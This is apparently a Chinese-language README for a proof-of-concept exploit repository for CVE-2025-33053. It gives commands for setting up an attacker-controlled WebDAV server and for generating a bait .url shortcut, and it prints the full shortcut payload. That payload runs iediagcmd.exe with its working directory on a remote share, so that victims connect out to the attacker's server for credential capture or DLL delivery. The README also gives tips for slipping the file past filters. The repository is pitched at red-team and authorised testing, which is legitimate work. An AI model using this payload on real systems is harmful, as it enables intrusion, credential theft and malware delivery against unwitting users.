CVE-2025-33053 概念验证(PoC)
本仓库提供脚本,用于在 Ubuntu 上使用 Apache2 自动部署 WebDAV 服务器,并生成恶意的 .url 快捷方式文件,供渗透测试、红队演练或横向移动模拟使用。
setup_webdav.sh – Bash 脚本,用于配置 Apache2 + WebDAV。setup_webdav.py – 上述脚本的 Python 版本。gen_url.py – Python 脚本,用于生成包含 UNC/WebDAV 路径的 .url 快捷方式文件。README.md – 文档。sudo)sudo bash setup_webdav.sh
或使用 Python:
sudo python3 setup_webdav.py
默认情况下,该脚本会:
/var/www/webdav 创建共享目录。DAV 和 DAV_FS 模块。DavLockDB 目录(防止 Apache DAV 锁定错误)。📎 WebDAV 路径:
http://<你的IP>/webdav/
.url 快捷方式python3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
这将创建一个如下的 .url 文件:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 在某些配置下,点击该文件可能导致目标系统自动连接你的 WebDAV 服务器(用于身份验证或 DLL 投递)。
sudo ufw allow 80
.url 文件的执行效果可能因以下因素而异:
.url 压缩或重命名为 .txt 以绕过过滤器。本仓库仅用于教育和授权的渗透测试。
请勿在未经拥有或授权的系统上使用这些脚本。
如有疑问或道德红队演练请求,请通过 GitHub Issues 联系。